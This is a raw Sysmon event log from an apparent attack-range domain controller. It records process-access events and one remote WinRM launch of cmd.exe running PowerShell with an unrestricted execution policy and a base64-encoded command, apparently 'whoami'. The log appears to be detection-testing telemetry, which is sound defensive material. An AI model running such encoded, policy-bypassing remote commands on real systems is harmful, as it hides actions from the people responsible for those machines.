10341000x80000000000000003482Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-6497-6064-8700-00000000AE01}12202076C:\Windows\system32\conhost.exe{266CAFBE-6497-6064-8800-00000000AE01}4812C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003481Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003480Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003479Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003478Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003477Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003476Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003475Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003474Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003473Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003472Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.705{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6497-6064-8800-00000000AE01}4812C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003471Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-6497-6064-8600-00000000AE01}46324780C:\Windows\system32\WinrsHost.exe{266CAFBE-6497-6064-8800-00000000AE01}4812C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x80000000000000003470Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-6497-6064-8800-00000000AE01}4812C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
dwBoAG8AYQBtAGkAC:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6497-6064-FF70-070000000000}0x770ff0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-6497-6064-8600-00000000AE01}4632C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000003469Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.689{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003468Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.689{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003467Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.689{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000003466Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.689{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000003465Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.674{266CAFBE-646C-6064-1500-00000000AE01}13161696C:\Windows\system32\svchost.exe{266CAFBE-6497-6064-8600-00000000AE01}4632C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000003464Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.658{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6497-6064-8600-00000000AE01}4632C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003463Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.658{266CAFBE-6497-6064-8700-00000000AE01}12202076C:\Windows\system32\conhost.exe{266CAFBE-6497-6064-8600-00000000AE01}4632C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003462Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.643{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6497-6064-8700-00000000AE01}1220C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003461Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003460Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003459Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003458Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003457Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 